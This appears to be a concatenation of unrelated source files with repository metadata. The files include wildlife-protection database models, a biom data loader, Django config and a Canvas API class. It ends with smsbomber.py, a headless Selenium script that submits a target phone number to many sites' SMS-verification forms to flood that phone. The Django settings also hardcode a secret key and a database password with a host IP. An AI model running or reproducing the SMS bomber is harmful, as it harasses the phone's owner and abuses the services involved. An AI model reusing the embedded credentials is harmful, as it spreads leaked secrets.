Column('nom_zone_sensible', String),
Column('niveau_sensibilite', Integer),
Column('nb_poteaux_inventories', BigInteger),
Column('nb_poteaux_inventories_risque_fort', BigInteger),
Column('nb_poteaux_inventories_risque_secondaire', BigInteger),
Column('nb_poteaux_inventories_risque_faible', BigInteger),
Column('nb_poteaux_equipes', BigInteger),
Column('nb_poteaux_equipes_risque_fort', BigInteger),
Column('nb_poteaux_equipes_risque_secondaire', BigInteger),
Column('nb_poteaux_equipes_risque_faible', BigInteger),
Column('m_troncons_inventories', Float(53)),
Column('m_troncons_inventories_risque_fort', Float(53)),
Column('m_troncons_inventories_risque_secondaire', Float(53)),
Column('m_troncons_inventories_risque_faible', Float(53)),
Column('m_troncons_equipes', Float(53)),
Column('m_troncons_equipes_risque_fort', Float(53)),
Column('m_troncons_equipes_risque_secondaire', Float(53)),
Column('m_troncons_equipes_risque_faible', Float(53)),
Column('geom', Text)
)
class TVZonesSensibles(object):
pass
mapper(TVZonesSensibles, t_v_zones_sensibles)
class TInventairePoteauxErdf(Base):
__tablename__ = 't_inventaire_poteaux_erdf'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326'),
Index('t_inventaire_poteaux_erdf_index_id', 'id_type_poteau_erdf', 'id_type_poteau_erdf_secondaire', 'id_zone_sensible', 'id_attractivite', 'id_dangerosite')
)
id_inventaire_poteau_erdf = Column(Integer, primary_key=True, server_default=text("nextval('t_inventaire_poteaux_erdf_id_inventaire_poteau_erdf_seq'::regclass)"))
date_inventaire = Column(Date)
id_type_poteau_erdf = Column(ForeignKey(u'dico_type_poteau_erdf.id_type_poteau_erdf'))
id_type_poteau_erdf_secondaire = Column(ForeignKey(u'dico_type_poteau_erdf.id_type_poteau_erdf'))
remarques = Column(String)
id_zone_sensible = Column(ForeignKey(u't_zones_sensibles.id_zone_sensible'))
etat_poteau = Column(String)
id_attractivite = Column(ForeignKey(u'dico_classes_risque.id_classe_risque'))
id_dangerosite = Column(ForeignKey(u'dico_classes_risque.id_classe_risque'))
neutralisation_prevue_isolation = Column(Boolean)
neutralisation_prevue_dissuasion = Column(Boolean)
neutralisation_prevue_attraction = Column(Boolean)
deja_neutralise = Column(Boolean)
geom = Column(NullType, index=True)
geom_json = Column(String)
risque_poteau = Column(Unicode(20))
commune = Column(String(100))
nb_equipements = Column(Integer)
nb_photos = Column(Integer)
insee = Column(ForeignKey(u't_communes.insee'))
dico_classes_risque = relationship(u'DicoClassesRisque', primaryjoin='TInventairePoteauxErdf.id_attractivite == DicoClassesRisque.id_classe_risque')
dico_classes_risque1 = relationship(u'DicoClassesRisque', primaryjoin='TInventairePoteauxErdf.id_dangerosite == DicoClassesRisque.id_classe_risque')
dico_type_poteau_erdf = relationship(u'DicoTypePoteauErdf', primaryjoin='TInventairePoteauxErdf.id_type_poteau_erdf == DicoTypePoteauErdf.id_type_poteau_erdf')
dico_type_poteau_erdf1 = relationship(u'DicoTypePoteauErdf', primaryjoin='TInventairePoteauxErdf.id_type_poteau_erdf_secondaire == DicoTypePoteauErdf.id_type_poteau_erdf')
t_zones_sensible = relationship(u'TZonesSensible', backref='poteaux')
t_commune = relationship(u'TCommune', backref='poteaux')
class TInventaireTronconsErdf(Base):
__tablename__ = 't_inventaire_troncons_erdf'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'LINESTRING'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326'),
Index('t_inventaire_troncons_erdf_index_id', 'id_zone_sensible', 'id_risque_deplacement', 'id_risque_integration_topo', 'id_risque_integration_vegetation', 'id_risque_integration_bati')
)
id_inventaire_troncon_erdf = Column(Integer, primary_key=True, server_default=text("nextval('t_inventaire_troncons_erdf_id_inventaire_troncon_erdf_seq'::regclass)"))
date_inventaire = Column(Date)
id_zone_sensible = Column(ForeignKey(u't_zones_sensibles.id_zone_sensible'))
geom = Column(NullType, index=True)
remarques = Column(String)
id_risque_deplacement = Column(ForeignKey(u'dico_classes_risque.id_classe_risque'))
id_risque_integration_topo = Column(ForeignKey(u'dico_classes_risque.id_classe_risque'))
id_risque_integration_vegetation = Column(ForeignKey(u'dico_classes_risque.id_classe_risque'))
id_risque_integration_bati = Column(ForeignKey(u'dico_classes_risque.id_classe_risque'))
deja_neutralise = Column(Boolean)
geom_json = Column(String)
risque_troncon = Column(String(20))
commune = Column(String(100))
nb_photos = Column(Integer)
lg_equipee = Column(Float(53))
longueur = Column(Float(53))
insee = Column(ForeignKey(u't_communes.insee'))
dico_classes_risque = relationship(u'DicoClassesRisque', primaryjoin='TInventaireTronconsErdf.id_risque_deplacement == DicoClassesRisque.id_classe_risque')
dico_classes_risque1 = relationship(u'DicoClassesRisque', primaryjoin='TInventaireTronconsErdf.id_risque_integration_bati == DicoClassesRisque.id_classe_risque')
dico_classes_risque2 = relationship(u'DicoClassesRisque', primaryjoin='TInventaireTronconsErdf.id_risque_integration_topo == DicoClassesRisque.id_classe_risque')
dico_classes_risque3 = relationship(u'DicoClassesRisque', primaryjoin='TInventaireTronconsErdf.id_risque_integration_vegetation == DicoClassesRisque.id_classe_risque')
t_zones_sensible = relationship(u'TZonesSensible')
t_commune = relationship(u'TCommune', backref='troncons')
class TObservation(Base):
__tablename__ = 't_observations'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2')
)
id_observation = Column(Integer, primary_key=True, server_default=text("nextval('t_observations_id_observation_seq'::regclass)"))
id_espece = Column(ForeignKey(u't_especes.id_espece', ondelete=u'CASCADE', onupdate=u'CASCADE'), nullable=False)
lieu = Column(String(100))
commentaires = Column(String)
precision_loc = Column(String(50))
source = Column(String(50))
geom = Column(NullType, index=True)
geom_json = Column(String)
nombre = Column(Integer)
date = Column(Date)
t_espece = relationship(u'TEspece')
class TPhotosPoteauxErdf(Base):
__tablename__ = 't_photos_poteaux_erdf'
id_photo_poteau_erdf = Column(Integer, primary_key=True, server_default=text("nextval('t_photos_poteaux_erdf_id_photo_poteau_erdf_seq'::regclass)"))
id_inventaire_poteau_erdf = Column(ForeignKey(u't_inventaire_poteaux_erdf.id_inventaire_poteau_erdf', ondelete=u'CASCADE', onupdate=u'CASCADE'))
chemin_photo = Column(String)
commentaire = Column(String)
neutralise = Column(Boolean)
auteur = Column(String)
t_inventaire_poteaux_erdf = relationship(u'TInventairePoteauxErdf')
class TPhotosTronconsErdf(Base):
__tablename__ = 't_photos_troncons_erdf'
id_photo_troncon_erdf = Column(Integer, primary_key=True, server_default=text("nextval('t_photos_troncons_erdf_id_photo_troncon_erdf_seq'::regclass)"))
id_inventaire_troncon_erdf = Column(ForeignKey(u't_inventaire_troncons_erdf.id_inventaire_troncon_erdf', ondelete=u'CASCADE', onupdate=u'CASCADE'))
chemin_photo = Column(String)
commentaire = Column(String)
neutralise = Column(Boolean)
auteur = Column(String)
t_inventaire_troncons_erdf = relationship(u'TInventaireTronconsErdf')
class TSitesNidification(Base):
__tablename__ = 't_sites_nidification'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id_site_nidification = Column(Integer, primary_key=True, server_default=text("nextval('t_sites_nidification_id_site_nidification_seq'::regclass)"))
id_espece = Column(ForeignKey(u't_especes.id_espece', ondelete=u'CASCADE', onupdate=u'CASCADE'), nullable=False)
lieu = Column(String(100))
nidification_10_ans = Column(Boolean)
commentaires = Column(String)
precision_loc = Column(String(50))
source = Column(String(50))
geom = Column(NullType, index=True)
geom_json = Column(String)
t_espece = relationship(u'TEspece')
class TZonesSensible(Base):
__tablename__ = 't_zones_sensibles'
id_zone_sensible = Column(Integer, primary_key=True, server_default=text("nextval('t_zone_sensible_id_zone_sensible_seq'::regclass)"))
nom_zone_sensible = Column(String)
niveau_sensibilite = Column(Integer)
t_v_equipements_poteaux = Table(
'v_equipements_poteaux', metadata,
Column('id', Integer, primary_key=True),
Column('id_inventaire_poteau_erdf', Integer),
Column('nom_type_equipement_poteau', String),
Column('id_nb_equipements', Integer),
Column('mis_en_place', Boolean),
Column('date_equipement', Date),
Column('geom_json', String)
)
class TVEquipementsPoteaux(object):
pass
mapper(TVEquipementsPoteaux, t_v_equipements_poteaux)
t_v_sites_nidification_zone_tampon = Table(
'v_sites_nidification_zone_tampon', metadata,
Column('id_espece', Integer),
Column('nom_espece', String(100)),
Column('geom', NullType),
Column('geom_json', Text)
)
t_v_zones_sensibles_poteaux = Table(
'v_zones_sensibles_poteaux', metadata,
Column('id_zone_sensible', Integer),
Column('nb_poteaux_inventories', BigInteger),
Column('nb_poteaux_inventories_risque_fort', BigInteger),
Column('nb_poteaux_inventories_risque_secondaire', BigInteger),
Column('nb_poteaux_inventories_risque_faible', BigInteger),
Column('nb_poteaux_equipes', BigInteger),
Column('nb_poteaux_equipes_risque_fort', BigInteger),
Column('nb_poteaux_equipes_risque_secondaire', BigInteger),
Column('nb_poteaux_equipes_risque_faible', BigInteger),
Column('geom', NullType)
)
t_v_zones_sensibles_troncons = Table(
'v_zones_sensibles_troncons', metadata,
Column('id_zone_sensible', Integer),
Column('m_troncons_inventories', Float(53)),
Column('m_troncons_inventories_risque_fort', Float(53)),
Column('m_troncons_inventories_risque_secondaire', Float(53)),
Column('m_troncons_inventories_risque_faible', Float(53)),
Column('m_troncons_equipes', Float(53)),
Column('m_troncons_equipes_risque_fort', Float(53)),
Column('m_troncons_equipes_risque_secondaire', Float(53)),
Column('m_troncons_equipes_risque_faible', Float(53)),
Column('geom', NullType)
)
|
[
"[email protected]"
] | |
6e0ae3e9c859c2ff133011147002083abb1e1ecf
|
6dfb7fe44b6c5bfb7feb5a101656e3d3402a621f
|
/simp_py_examples/course/S1800/t105.py
|
14b64f55e86d1ce9d76af5b273b6ada48bd93378
|
[
"MIT"
] |
permissive
|
kcfkwok2003/Simp_py
|
11d6813fac83ab6309eb8efc22fcd8edde5b19b8
|
f75e66da01b45dc8688dda602f8b33d4258f0c31
|
refs/heads/master
| 2021-05-11T00:36:36.872754 | 2018-12-19T01:41:15 | 2018-12-19T01:41:15 | 118,306,332 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 149 |
py
|
from simp_py import tft
lcd = tft.tft
lcd.clear()
import time
cnt=10
while cnt >=0:
lcd.text(10,10, 'count: %s ' % cnt)
cnt -=1
time.sleep(1)
|
[
"[email protected]"
] | |
d02fb0c15d67504305264787a3321d77fe9822f8
|
068ac6386ff76431e308b7d7b69d8f8c8ae4f724
|
/jmj/wsgi.py
|
bccbd5fdc6024710a40b741290eb0bce529d8b94
|
[] |
no_license
|
Cesarcalles1/proyecto
|
67cf0a618e34c728bcf51ec54015170446997ba4
|
6417126c57ace7854b25ad5a042e8080bbd52f82
|
refs/heads/master
| 2021-05-04T05:30:38.363080 | 2018-02-05T16:58:47 | 2018-02-05T16:58:47 | 120,339,693 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 383 |
py
|
"""
WSGI config for jmj project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "jmj.settings")
application = get_wsgi_application()
|
[
"[email protected]"
] | |
bfc47b482deb0ccf1f3e645d49665369758987ff
|
3a3e823f6b94b7eae8a363b0b51b036d2b0a1669
|
/metvae/dataset/biom.py
|
aa3196a0a38243f360389493a4983f3f36972811
|
[] |
no_license
|
mortonjt/metvae
|
8a28bbbd72ee79d66992bd31bd82af65b83ea819
|
f2f241fdedd2f4c045a088727df1f155b9ce9a20
|
refs/heads/main
| 2022-12-31T16:24:26.014394 | 2020-10-20T23:38:50 | 2020-10-20T23:38:50 | 305,812,115 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,780 |
py
|
import os
import re
import biom
import math
import logging
import numpy as np
import pandas as pd
import torch
from torch.utils.data import Dataset
from typing import List
logger = logging.getLogger(__name__)
class BiomDataset(Dataset):
"""Loads a `.biom` file.
Parameters
----------
filename : Path
Filepath to biom table
metadata_file : Path
Filepath to sample metadata
batch_category : str
Column name for batch indices
"""
def __init__(
self,
table: biom.Table,
metadata: pd.DataFrame = None,
batch_category: str = None,
):
super(BiomDataset).__init__()
self.table = table
self.metadata = metadata
self.batch_category = batch_category
self.populate()
def populate(self):
logger.info("Preprocessing dataset")
if self.metadata is not None:
# match the metadata with the table
ids = set(self.table.ids()) & set(self.metadata.index)
filter_f = lambda v, i, m: i in ids
self.table = self.table.filter(filter_f, axis='sample')
self.metadata = self.metadata.loc[self.table.ids()]
if self.metadata.index.name is None:
raise ValueError('`Index` must have a name either'
'`sampleid`, `sample-id` or #SampleID')
self.index_name = self.metadata.index.name
self.metadata = self.metadata.reset_index()
self.batch_indices = None
if self.batch_category is not None and self.metadata is not None:
batch_cats = np.unique(self.metadata[self.batch_category].values)
batch_cats = pd.Series(
np.arange(len(batch_cats)), index=batch_cats)
self.batch_indices = np.array(
list(map(lambda x: batch_cats.loc[x],
self.metadata[self.batch_category].values)))
logger.info("Finished preprocessing dataset")
def __len__(self) -> int:
return len(self.table.ids())
def __getitem__(self, i):
""" Returns all of the samples for a given subject
Returns
-------
counts : np.array
OTU counts for specified samples.
batch_indices : np.array
Membership ids for batch samples. If not specified, return None.
"""
sample_idx = self.table.ids()[i]
if self.batch_indices is not None:
batch_indices = self.batch_indices[i]
else:
batch_indices = None
counts = self.table.data(id=sample_idx, axis='sample')
return counts, batch_indices
def __iter__(self):
worker_info = torch.utils.data.get_worker_info()
start = 0
end = self.__len__()
if worker_info is None: # single-process data loading
for i in range(end):
yield self.__getitem__(i)
else:
worker_id = worker_info.id
w = float(worker_info.num_workers)
t = (end - start)
per_worker = int(math.ceil(t / w))
iter_start = start + worker_id * per_worker
iter_end = min(iter_start + per_worker, end)
for i in range(iter_start, iter_end):
yield self.__getitem__(i)
class BiomBatchDataset(BiomDataset):
"""Loads a `.biom` file.
Parameters
----------
filename : Path
Filepath to biom table
metadata_file : Path
Filepath to sample metadata
batch_differentials : str
Pre-trained batch differentials effects
batch_category : str
Column name in metadata for batch indices
Notes
-----
Important, periods cannot be handled in the labels
in the batch_category. Make sure that these are converted to
hyphens or underscores.
"""
def __init__(
self,
table: biom.Table,
metadata: pd.DataFrame,
batch_differentials : pd.DataFrame,
batch_category: str,
format_columns=True,
):
super(BiomBatchDataset).__init__()
self.table = table
self.metadata = metadata
self.batch_category = batch_category
self.batch_differentials = batch_differentials
self.format_columns = format_columns
self.populate()
def populate(self):
logger.info("Preprocessing dataset")
# Match the metadata with the table
ids = set(self.table.ids()) & set(self.metadata.index)
filter_f = lambda v, i, m: i in ids
self.table = self.table.filter(filter_f, axis='sample')
self.metadata = self.metadata.loc[self.table.ids()]
if self.metadata.index.name is None:
raise ValueError('`Index` must have a name either'
'`sampleid`, `sample-id` or #SampleID')
self.index_name = self.metadata.index.name
self.metadata = self.metadata.reset_index()
# Clean up the batch indexes
if self.format_columns:
if (self.metadata[self.batch_category].dtypes == np.float64 or
self.metadata[self.batch_category].dtypes == np.int64):
# format the batch category column
m = self.metadata[self.batch_category].astype(np.int64)
self.metadata[self.batch_category] = m.astype(np.str)
cols = self.batch_differentials.columns
def regex_f(x):
return re.findall(r"\[([A-Za-z0-9_]+).*\]", x)[0]
cols = list(map(regex_f, cols))
print('columns', cols)
self.batch_differentials.columns = cols
# Retrieve batch labels
batch_cats = np.unique(self.metadata[self.batch_category].values)
batch_cats = pd.Series(
np.arange(len(batch_cats)), index=batch_cats)
self.batch_indices = np.array(
list(map(lambda x: batch_cats.loc[x],
self.metadata[self.batch_category].values)))
# Clean up batch differentials
table_features = set(self.table.ids(axis='observation'))
batch_features = set(self.batch_differentials.index)
ids = table_features & batch_features
filter_f = lambda v, i, m: i in ids
self.table = self.table.filter(filter_f, axis='observation')
table_obs = self.table.ids(axis='observation')
self.batch_differentials = self.batch_differentials.loc[table_obs]
logger.info("Finished preprocessing dataset")
def __getitem__(self, i):
""" Returns all of the samples for a given subject.
Returns
-------
counts : np.array
OTU counts for specified samples.
batch_indices : np.array
Membership ids for batch samples.
"""
sample_idx = self.table.ids()[i]
batch_index = self.batch_indices[i]
counts = self.table.data(id=sample_idx, axis='sample')
batch_diffs = self.batch_differentials
assert batch_index < batch_diffs.shape[1], f'Batch diffs " {batch_diffs.shape[1]} > index : {batch_index}'
batch_diffs = np.array(batch_diffs.iloc[:, batch_index].values)
return counts, batch_diffs
def collate_single_f(batch):
counts_list = np.vstack([b[0] for b in batch])
counts = torch.from_numpy(counts_list).float()
return counts
def collate_batch_f(batch):
counts_list = np.vstack([b[0] for b in batch])
batch_diffs = np.vstack([b[1] for b in batch])
counts = torch.from_numpy(counts_list).float()
batch_diffs = torch.from_numpy(batch_diffs).float()
return counts, batch_diffs
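# --- Illustrative sketch, not part of the module above ---
# A minimal example of wiring BiomDataset into a PyTorch DataLoader with
# collate_single_f; the toy table, sample ids, and batch size are assumptions
# made up for illustration only.
if __name__ == "__main__":
    from torch.utils.data import DataLoader

    # Tiny toy table: 3 observations (rows) x 4 samples (columns).
    toy = biom.Table(
        np.arange(12).reshape(3, 4),
        observation_ids=['o1', 'o2', 'o3'],
        sample_ids=['s1', 's2', 's3', 's4'],
    )
    meta = pd.DataFrame({'batch': ['a', 'a', 'b', 'b']},
                        index=pd.Index(['s1', 's2', 's3', 's4'], name='sampleid'))
    dataset = BiomDataset(toy, metadata=meta, batch_category='batch')
    loader = DataLoader(dataset, batch_size=2, collate_fn=collate_single_f)
    for counts in loader:
        print(counts.shape)  # counts for 2 samples x 3 observations
# --- end of illustrative sketch ---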
|
[
"[email protected]"
] | |
a5da3fc38c2b91b2122f0fd2cb7e5d2e1f764ad9
|
9dc3ae479c1b5c6941681917151fcb0379f9173d
|
/CanvasFeatureFlag.py
|
7a8e37d3b28a61f52fb91ba58b6f1eb53cf1381a
|
[] |
no_license
|
cthacker-udel/Python-Canvas-API-Wrapper
|
bf2400b42b644791f45bbda7ed42e2c03a8d97b2
|
0263c591a2b02197529559346558b9be02f592c3
|
refs/heads/master
| 2023-08-25T12:01:48.417204 | 2021-10-09T10:49:51 | 2021-10-09T10:49:51 | 388,362,237 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 575 |
py
|
from CanvasClient import CanvasClient
class CanvasFeatureFlags(CanvasClient):
def __init__(self):
self.course_id = None
self.account_id = None
self.user_id = None
self.feature_id = None
self.state = None
def generate_queries(self):
body = {}
if self.state is not None:
body['state'] = self.state
return body
def clear_queries(self):
self.course_id = None
self.account_id = None
self.user_id = None
self.feature_id = None
self.state = None
|
[
"[email protected]"
] | |
c946ebf65e15dab1f0d9b98fff4d00ee381324a6
|
2dfc7642e778390b89a40413dbb64f2930b50ceb
|
/class5-functions_and_loops/problem.py
|
496ee84f08f5e1947c5bf45dcafd79373b57a2b6
|
[] |
no_license
|
tsui-david/tzu-chi-cs-class
|
dc740d50fcbdec91ab2be57fa41ebf4bdbc211c2
|
b75b567719ad03d46a42bdc671cad26f6f28e777
|
refs/heads/main
| 2023-03-20T11:37:24.989996 | 2021-03-07T16:20:05 | 2021-03-07T16:20:05 | 307,110,975 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 777 |
py
|
"""
Last week we created a program that accepts user input for number
and checks for:
(1) If number is odd, print out "odd"
(2) If number is even, print out "even"
"""
input_num = int(input('Input a number: '))
if input_num % 2 == 0:
print("even")
else:
print("odd")
"""
This week I want you to keep asking the user for numbers and print out even/odd until the user types in "stop"
To do this I would like the following requirements:
- [ ] Until the user types in "stop" do not exit the code (hint: what allows us to do things over and over again?)
- [ ] Organize the even/odd logic into a function called "getEvenOdd"
- [ ] getEvenOdd will return the string "even" if the argument is even and "odd" if the argument is "odd"
- [ ] use getEvenOdd in your program
"""
|
[
"[email protected]"
] | |
35a7b100287d182cc18bd381c35f0962b21d2a4c
|
481f1f66071fc9b9eb8ea88e4df4e5186d99cdab
|
/cs540_project/settings.py
|
ed9c788dfa04191afa583308024095f3d3d778dc
|
[] |
no_license
|
tso2381637/cs540_project
|
3cc1cee12095377c16046f666a4ab077bcf08508
|
1803d0ce87465032c8921bec64f0e0dd82c82cd4
|
refs/heads/master
| 2021-02-11T17:44:48.363496 | 2020-03-13T04:31:10 | 2020-03-13T04:31:10 | 244,514,913 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,390 |
py
|
"""
Django settings for cs540_project project.
Generated by 'django-admin startproject' using Django 2.2.10.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')4@vhi%0rq(h@=uwzwb1y&@am=kob=))kvat5xqqw9l0jne(##'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'home.apps.HomeConfig',
'rest_framework',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cs540_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'cs540_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'crash_data',
'USER': 'eason',
'PASSWORD': 'pa55word',
'HOST': '34.83.53.44', # Or an IP Address that your DB is hosted on
'PORT': '3306',
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
DATETIME_FORMAT = '%m/%d/%Y %I:%M'
|
[
"[email protected]"
] | |
f067595b20bc57e3ed96ec100e0903721aaeea6c
|
1e2f1acfee7b707a6cc7cfe0ef48655b2a89fd11
|
/smsbomber.py
|
eef5d18d6c83cb56dad509c85d5c02dd9d39be14
|
[] |
no_license
|
bumzy/smsbomber
|
4431a07188c78bec7c296dadf37910cbe7e57ae8
|
d0c52d7d72b63caf580a505fed359da85dcdc8e4
|
refs/heads/master
| 2021-06-11T07:11:44.841964 | 2019-06-23T05:00:34 | 2019-06-23T05:00:34 | 193,308,016 | 0 | 0 | null | 2021-06-01T23:50:51 | 2019-06-23T04:57:24 |
Python
|
UTF-8
|
Python
| false | false | 17,432 |
py
|
# encoding=utf8
import time
from selenium import webdriver
class Bomber(object):
def __init__(self, phone):
self.phone = phone
self.options = webdriver.FirefoxOptions()
self.options.add_argument('--headless')  # headless mode
# Baidu
def func0(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.baidu.com/')
browser.find_element_by_xpath('//*[@id="u1"]/a[7]').click()
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__footerULoginBtn"]').click()
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsSwitchWrapper"]').click()
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsPhone"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsTimer"]').click()
browser.quit()
# Yihaodian (yhd.com)
def func1(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://passport.yhd.com/passport/register_input.do')
browser.find_element_by_xpath('//*[@id="userName"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="validPhoneCodeDiv"]/a').click()
browser.find_element_by_xpath('//*[@id="validPhoneCodeDiv"]/a').click()
browser.quit()
# China Mobile
def func2(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://login.10086.cn/login.html')
browser.find_element_by_xpath('//*[@id="sms_login_1"]').click()
browser.find_element_by_xpath('//*[@id="sms_name"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="getSMSPwd1"]').click()
browser.quit()
# 51book
def func3(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://caigou.51book.com/caigou/manage/designatedRegistryNewSignon.in')
browser.find_element_by_xpath('//*[@id="cg_06"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendMSgBtu"]').click()
browser.quit()
# Shijiebang
def func4(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.shijiebang.com/reg/')
browser.find_element_by_xpath('/html/body/div[1]/div/div[3]/div/ul[1]/li[1]/a').click()
browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/div/label[2]/input').click()
browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/table[2]/tbody/tr[1]/td/div/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/table[2]/tbody/tr[2]/td/div/button').click()
browser.quit()
# 优酷
def func5(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://account.youku.com/register.htm')
browser.find_element_by_xpath('//*[@id="passport"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="password"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="repeatPsd"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="getMobileCode"]').click()
browser.quit()
# 亚马逊
def func6(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.amazon.cn/ap/register?_encoding=UTF8&openid.assoc_handle=cnflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.cn%2Fgp%2Fyourstore%2Fhome%3Fie%3DUTF8%26ref_%3Dnav_custrec_newcust')
# browser.find_element_by_xpath('//*[@id="nav-flyout-ya-newCust"]/a').click()
browser.find_element_by_xpath('//*[@id="ap_customer_name"]').send_keys('Mike998')
browser.find_element_by_xpath('//*[@id="ap_phone_number"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="ap_password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="ap_register_form"]/div/div/div[5]/div/label/input').click()
browser.find_element_by_xpath('//*[@id="continue"]').click()
browser.quit()
# 私否
def func7(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://segmentfault.com/')
browser.find_element_by_xpath('/html/body/div[2]/nav/div[2]/div[2]/ul/li/a[1]').click()
browser.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div/form/div[4]/a').click()
browser.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div/form/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div/form/div[2]/div[1]/span/button').click()
browser.quit()
# 中瑞财富
def func8(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.zrcaifu.com/register')
browser.find_element_by_xpath('//*[@id="register-ul"]/li[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="register-ul"]/li[1]/input').click()
browser.find_element_by_xpath('//*[@id="register-ul"]/li[2]/input').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="register-ul"]/li[2]/input').click()
browser.find_element_by_xpath('//*[@id="register-ul"]/li[3]/input').send_keys('pwd123456')
